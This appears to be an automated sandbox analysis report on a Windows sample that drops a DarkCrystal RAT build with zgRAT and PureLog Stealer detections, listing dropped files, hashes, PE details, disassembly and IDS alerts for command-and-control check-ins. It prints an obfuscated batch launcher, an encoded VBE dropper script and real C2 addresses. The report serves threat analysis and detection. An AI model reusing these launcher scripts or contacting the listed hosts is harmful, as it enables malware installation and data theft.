                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\wKKCkQsU.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):33792
                                                                                                                      Entropy (8bit):5.541771649974822
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\xqfrsuNN.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):342528
                                                                                                                      Entropy (8bit):6.170134230759619
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                      MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                      SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                      SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                      SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\yYksYVbT.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):126976
                                                                                                                      Entropy (8bit):6.057993947082715
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                      MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                      SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                      SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                      SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\zbqSUreo.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):39936
                                                                                                                      Entropy (8bit):5.660491370279985
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                      MD5:240E98D38E0B679F055470167D247022
                                                                                                                      SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                      SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                      SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\bridgeMonitorDhcpCommon\98135c31e34d63

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:ASCII text, with very long lines (528), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):528
                                                                                                                      Entropy (8bit):5.86146629288854
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:7G6L9eqdASkAEXjaXl+9vBLm4fhBxAP/K+26Hzjm/UbbbZyj:7G6LFOSkhO1+9v5muXuK+2ujmCb8
                                                                                                                      MD5:003966389C0FE84EEB10466BF228C2E1
                                                                                                                      SHA1:4EE62E74BFC80741615218F35B5F35EF23AD16BD
                                                                                                                      SHA-256:5E1DF552863B72CAB377F7F6025882BBC84D302AA5A074DD1A19261EB185BA84
                                                                                                                      SHA-512:03B7D6C2380261AA05E412761E02AC0BD6ABC9294CF4FF55670A0DD17F1667D9C0B346BC2DC406B7723101FDF033FEBA0594DB27E5D99C1E66DB9D4851DD9198
                                                                                                                      Malicious:false
                                                                                                                      Preview:iiYTSvfoYvEaphKRzXUT28gc0Sd11puQRmThaZLefiD2BMofmKgt0xokC5d9SoxtBxICOn1aLzyT5nbon7OqIAae8sff6LM1vT0NDmQ9TGhA8VoYdzWUaGlBWoDfIVeAn7hmwOkBqOXCcafnEGCHz2apsz0Yiv18mhXBxClPOUnLtii6JabBTXKug237XLc5XYa4DdzBfw2ePP5JQ4PIU0oOWmf5Jn2C2rxUIo2pkZfgeqeQ6uqc6UlhtLha842140mhblAmBkh4UIuqIO8Y7ZFiGQk7GcqqhnmoD6zVtDaWwrMla1Rt6d4euDbKADgj30WrgGmLZmp38tvZE9gPK7uDtH3AeoVqh1d6UfFUOGUTxBfASCGBgRY5GS8ZMmqvR9WHPzEi3LAEmbQrl2rchTJPdh0BhqIlZjByoYud7iHVQUTpCQxT4ON70Gos8DBNCYpDZbDMHOe9My8JOL8R2zqKVE8iuCe4g3S2oPQkMkLquOvBHeexEtVNresUdecFtjcSgGe85XERoAaG

                                                                                                                      C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3538432
                                                                                                                      Entropy (8bit):7.811102685383502
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:i2EAM8/6Xg6/x08VtOkxE4HfOi5nZ/Ite8eeAd9nOtgwD9sY:inblgmx0+tp+wPJuYZtggwD9
                                                                                                                      MD5:26C2B88440A62B4CB79201E01A404BD2
                                                                                                                      SHA1:AD784AF316C9674AB5963D9F3144EAB1A41DA087
                                                                                                                      SHA-256:B36300C80EB1D3B7BA75FF58BF058D10A7D757F14A83026981477108D1F65268
                                                                                                                      SHA-512:EE00C4F8ACC8479071B2EB29BE9E9C6A21E84E330D76B00B33EA48D03972CD295719AF8A26B09F08431748941BD8433E02A2F8C118DA7398AFFB4FD08B445A31
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................5.........n.6.. ... 6...@.. .......................`6...........@................................. .6.K.... 6.p....................@6...................................................... ............... ..H............text...t.5.. ....5................. ..`.rsrc...p.... 6.......5.............@....reloc.......@6.......5.............@..B................P.6.....H...........D.......s...L...<,+...6......................................0..........(.... ........8........E....N...*...).......8I...(.... ....~....{....9....& ....8....*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0..-....... ........8........E............R.......F...e...8........~....(f...~....(j... ....?*... ....~....{....9....& ....8....r...ps....z*8.... ........8z......... ....~....{....9d...& ....8Y...~....(^... .... .... ....s....~....(b..

                                                                                                                      C:\bridgeMonitorDhcpCommon\KQ5XnVOYWwQFrPTZ9PsIrToBZTIRzi3E3YTHck8Ca7MF45bBlpw.bat

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):90
                                                                                                                      Entropy (8bit):5.126365840889883
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:sr8xXuwDbQI+rh9hHkjYmVNBvpjvAn:sAZXDMI+rh9hHkjYiN5in
                                                                                                                      MD5:5095F6A2A1E4C13B9F5AEBE3AB33F46C
                                                                                                                      SHA1:7064BE6BE58473F6061DFEEC53B5D9EE133C2EBF
                                                                                                                      SHA-256:BB6DD9570AB9AE6A8AD48E6C1B5F5282A8893FAFEBE04BD6995FE4A84C502976
                                                                                                                      SHA-512:9FAA172FF588E8FABF730CD61BC1F1ECEF37B1CAC02D9A63364691B58002F264C2C449B67F19B492A58483A921E599E988631DF203E00406A62D152D98357381
                                                                                                                      Malicious:false
                                                                                                                      Preview:%TbVHhfzaa%%UHCW%..%AnY%"C:\bridgeMonitorDhcpCommon/webDriverintoDll.exe"%dKqAVephdvFLFzJ%

                                                                                                                      C:\bridgeMonitorDhcpCommon\osBsCLbPfQftwHCHlhElxAOzJXM9OXwC38dZCkih.vbe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):253
                                                                                                                      Entropy (8bit):5.88666447746823
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:GEvwqK+NkLzWbH1xdyrFnBaORbM5nCcc26fR1FhgTnQFKRNmiI:GbMCzWL1xdyhBaORbQCNfb3wnQAR0iI
                                                                                                                      MD5:702E86FFF4B16185FBC8336F58FB7C37
                                                                                                                      SHA1:FC44B404441EE941444B921AAE7EA4F7A29BFCB6
                                                                                                                      SHA-256:98492002BCF6E2AD6900D1CA22771EBF429C6415253EE3EA2AC997120CEBD2E5
                                                                                                                      SHA-512:C622BDDC6563B44303CD0B437B8D885A7526FFC53BE7073D21C5C5C50A971A005A54E6771C62E433C3B2DE88C458D017554F4D2718B138E2BCF7916DF049327F
                                                                                                                      Malicious:false
                                                                                                                      Preview:#@~^5AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFq!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z8Mk9o+tW.rYKD9t1w/Gs:W.&znp*oU#rI.SpoDKP\,K/&.KKAtP&IyrfA&eK_^0%/mGtscl4~swSR8lDJS~Z~P6CVk++0gAAA==^#~@.

                                                                                                                      C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3538432
                                                                                                                      Entropy (8bit):7.811102685383502
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:i2EAM8/6Xg6/x08VtOkxE4HfOi5nZ/Ite8eeAd9nOtgwD9sY:inblgmx0+tp+wPJuYZtggwD9
                                                                                                                      MD5:26C2B88440A62B4CB79201E01A404BD2
                                                                                                                      SHA1:AD784AF316C9674AB5963D9F3144EAB1A41DA087
                                                                                                                      SHA-256:B36300C80EB1D3B7BA75FF58BF058D10A7D757F14A83026981477108D1F65268
                                                                                                                      SHA-512:EE00C4F8ACC8479071B2EB29BE9E9C6A21E84E330D76B00B33EA48D03972CD295719AF8A26B09F08431748941BD8433E02A2F8C118DA7398AFFB4FD08B445A31
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................5.........n.6.. ... 6...@.. .......................`6...........@................................. .6.K.... 6.p....................@6...................................................... ............... ..H............text...t.5.. ....5................. ..`.rsrc...p.... 6.......5.............@....reloc.......@6.......5.............@..B................P.6.....H...........D.......s...L...<,+...6......................................0..........(.... ........8........E....N...*...).......8I...(.... ....~....{....9....& ....8....*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0..-....... ........8........E............R.......F...e...8........~....(f...~....(j... ....?*... ....~....{....9....& ....8....r...ps....z*8.... ........8z......... ....~....{....9d...& ....8Y...~....(^... .... .... ....s....~....(b..

                                                                                                                      \Device\Null

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\w32tm.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):151
                                                                                                                      Entropy (8bit):4.746300568170299
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:VLV993J+miJWEoJ8FXwUXKEhvePjFy6vo13/FFyaNvj:Vx993DEU6XPF08
                                                                                                                      MD5:60F0CFC2418ADC0458FFE4CAD6D02FC1
                                                                                                                      SHA1:6BEECAB0E5B6EABA628D6C452D50C2DD8C4B1EC2
                                                                                                                      SHA-256:F7E74F29A29A41F2AD1F76E96366D3AC814E4DCC0E42E1D7CDF7179C8D2E2BB8
                                                                                                                      SHA-512:8301F2240CB3740C4F7830010D76BFCC28CB7B4DA4C4AE8C7B5A960CB701D383560176E5822614EBDCD2F9196C0EBE6035CC9D1D2CEDC028495B0B1F7382F1B2
                                                                                                                      Malicious:false
                                                                                                                      Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 08/12/2024 10:44:20..10:44:20, error: 0x80072746.10:44:26, error: 0x80072746.

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):7.52478186246308
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                      • InstallShield setup (43055/19) 0.21%
                                                                                                                      • Win32 Executable Delphi generic (14689/80) 0.07%
                                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                                      File name:gorkmTnChA.exe
                                                                                                                      File size:9'843'712 bytes
                                                                                                                      MD5:e4e1923f51eb61ed20cbbfab84ab25b5
                                                                                                                      SHA1:f50f90821c5e40a6b5289b8a0b084f831177cbef
                                                                                                                      SHA256:093e2a0c52459c17133b8dce76c887d8eb3588f2fdfc7b1cfb342a7225b6cdd6
                                                                                                                      SHA512:549cab4ea639ac9a68a5df6c119bd83bf8589d6b038e75c1443f9909c42013bc0634a8dab82cdc90cd6376a29892f7a5cbed74acbb601e1dd3e5e267cf12f8c3
                                                                                                                      SSDEEP:98304:HCnblgmx0+tp+wPJuYZtggwD9NrvLO010gIuekBbIAAvoTeU0q4ekVbu8sGL3sYr:ibptuYMgMLO0Ejc4egHsu8Y5e3km6Nso
                                                                                                                      TLSH:B2A6E021B246C837C56316B0197D9A5F8278AF321B7299CB73CC2E6E5B701C21736E67
                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                      File Icon

                                                                                                                      Icon Hash:90cececece8e8eb0

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x4020cc
                                                                                                                      Entrypoint Section:CODE
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                      DLL Characteristics:
                                                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:d59a4a699610169663a929d37c90be43

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      mov ecx, 0000000Ch
                                                                                                                      push 00000000h
                                                                                                                      push 00000000h
                                                                                                                      dec ecx
                                                                                                                      jne 00007EFF8C7F4F3Bh
                                                                                                                      push ecx
                                                                                                                      push ebx
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      mov eax, 0040209Ch
                                                                                                                      call 00007EFF8C7F49B0h
                                                                                                                      xor eax, eax
                                                                                                                      push ebp
                                                                                                                      push 00402361h
                                                                                                                      push dword ptr fs:[eax]
                                                                                                                      mov dword ptr fs:[eax], esp
                                                                                                                      lea edx, dword ptr [ebp-14h]
                                                                                                                      mov eax, 00402378h
                                                                                                                      call 00007EFF8C7F4D89h
                                                                                                                      mov eax, dword ptr [ebp-14h]
                                                                                                                      call 00007EFF8C7F4E59h
                                                                                                                      mov edi, eax
                                                                                                                      test edi, edi
                                                                                                                      jng 00007EFF8C7F5176h
                                                                                                                      mov ebx, 00000001h
                                                                                                                      lea edx, dword ptr [ebp-20h]
                                                                                                                      mov eax, ebx
                                                                                                                      call 00007EFF8C7F4E18h
                                                                                                                      mov ecx, dword ptr [ebp-20h]
                                                                                                                      lea eax, dword ptr [ebp-1Ch]
                                                                                                                      mov edx, 00402384h
                                                                                                                      call 00007EFF8C7F45A8h
                                                                                                                      mov eax, dword ptr [ebp-1Ch]
                                                                                                                      lea edx, dword ptr [ebp-18h]
                                                                                                                      call 00007EFF8C7F4D4Dh
                                                                                                                      mov edx, dword ptr [ebp-18h]
                                                                                                                      mov eax, 00404680h
                                                                                                                      call 00007EFF8C7F4480h
                                                                                                                      lea edx, dword ptr [ebp-2Ch]
                                                                                                                      mov eax, ebx
                                                                                                                      call 00007EFF8C7F4DE6h
                                                                                                                      mov ecx, dword ptr [ebp-2Ch]
                                                                                                                      lea eax, dword ptr [ebp-28h]
                                                                                                                      mov edx, 00402390h
                                                                                                                      call 00007EFF8C7F4576h
                                                                                                                      mov eax, dword ptr [ebp-28h]
                                                                                                                      lea edx, dword ptr [ebp-24h]
                                                                                                                      call 00007EFF8C7F4D1Bh
                                                                                                                      mov edx, dword ptr [ebp-24h]
                                                                                                                      mov eax, 00404684h
                                                                                                                      call 00007EFF8C7F444Eh
                                                                                                                      lea edx, dword ptr [ebp-38h]
                                                                                                                      mov eax, ebx
                                                                                                                      call 00007EFF8C7F4DB4h
                                                                                                                      mov ecx, dword ptr [ebp-38h]
                                                                                                                      lea eax, dword ptr [ebp-34h]
                                                                                                                      mov edx, 0040239Ch

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x50000x302.idata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x90000x96110c.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000x1c8.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x70000x18.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      CODE0x10000x13b80x1400e5913936857bed3b3b2fbac53e973471False0.6318359375data6.340990548290613IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      DATA0x30000x7c0x200cef89de607e490725490a3cd679af6bbFalse0.162109375Matlab v4 mat-file (little endian) , numeric, rows 0, columns 42304001.1176271682252383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      BSS0x40000x6950x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .idata0x50000x3020x4003d2f2fc4e279cba623217ec9de264c4fFalse0.3876953125data3.47731642923935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .tls0x60000x40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rdata0x70000x180x200467f29e48f3451df774e13adae5aafc2False0.05078125data0.1991075177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0x80000x1c80x2009859d413c7408cb699cca05d648c2502False0.876953125data5.7832974211095225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                      .rsrc0x90000x96110c0x9612006bfe8ee6b0c704e938b8bf00fc2d2522unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_RCDATA0x92940x3ae744PE32 executable (GUI) Intel 80386, for MS Windows0.4882011413574219
                                                                                                                      RT_RCDATA0x3b79d80x5b26a8PE32 executable (GUI) Intel 80386, for MS Windows0.40666961669921875
                                                                                                                      RT_RCDATA0x96a0800xeASCII text, with no line terminators1.5714285714285714
                                                                                                                      RT_RCDATA0x96a0900x1dASCII text, with no line terminators1.2758620689655173
                                                                                                                      RT_RCDATA0x96a0b00x1very short file (no magic)9.0
                                                                                                                      RT_RCDATA0x96a0b40x1very short file (no magic)9.0
                                                                                                                      RT_RCDATA0x96a0b80x1very short file (no magic)9.0
                                                                                                                      RT_RCDATA0x96a0bc0x1very short file (no magic)9.0
                                                                                                                      RT_RCDATA0x96a0c00x10data1.5
                                                                                                                      RT_RCDATA0x96a0d00x1very short file (no magic)9.0
                                                                                                                      RT_RCDATA0x96a0d40x38data1.0714285714285714

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      kernel32.dllGetCurrentThreadId, SetCurrentDirectoryA, GetCurrentDirectoryA, ExitProcess, RtlUnwind, RaiseException, TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, FreeLibrary, HeapFree, HeapReAlloc, HeapAlloc, GetProcessHeap
                                                                                                                      kernel32.dllWriteFile, SizeofResource, SetFilePointer, LockResource, LoadResource, GetWindowsDirectoryA, GetTempPathA, GetSystemDirectoryA, FreeResource, FindResourceA, CreateFileA, CloseHandle
                                                                                                                      shfolder.dllSHGetFolderPathA
                                                                                                                      shell32.dllShellExecuteA

                                                                                                                      Network Behavior

                                                                                                                      Suricata IDS Alerts

                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2024-12-08T15:27:00.047076+01002829202ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA1192.168.2.449730172.67.184.109443TCP
                                                                                                                      2024-12-08T15:27:23.309899+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449743185.246.67.7380TCP

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 8, 2024 15:26:57.537663937 CET49730443192.168.2.4172.67.184.109
                                                                                                                      Dec 8, 2024 15:26:57.537708998 CET44349730172.67.184.109192.168.2.4
                                                                                                                      Dec 8, 2024 15:26:57.537782907 CET49730443192.168.2.4172.67.184.109
                                                                                                                      Dec 8, 2024 15:26:57.549520016 CET49730443192.168.2.4172.67.184.109
                                                                                                                      Dec 8, 2024 15:26:57.549535036 CET44349730172.67.184.109192.168.2.4
                                                                                                                      Dec 8, 2024 15:26:58.768403053 CET44349730172.67.184.109192.168.2.4
                                                                                                                      Dec 8, 2024 15:26:58.768477917 CET49730443192.168.2.4172.67.184.109
                                                                                                                      Dec 8, 2024 15:26:58.818371058 CET49730443192.168.2.4172.67.184.109
                                                                                                                      Dec 8, 2024 15:26:58.818387985 CET44349730172.67.184.109192.168.2.4
                                                                                                                      Dec 8, 2024 15:26:58.818620920 CET44349730172.67.184.109192.168.2.4
                                                                                                                      Dec 8, 2024 15:26:58.818711042 CET49730443192.168.2.4172.67.184.109
                                                                                                                      Dec 8, 2024 15:26:58.822228909 CET49730443192.168.2.4172.67.184.109
                                                                                                                      Dec 8, 2024 15:26:58.867328882 CET44349730172.67.184.109192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:00.047090054 CET44349730172.67.184.109192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:00.047137976 CET44349730172.67.184.109192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:00.047156096 CET49730443192.168.2.4172.67.184.109
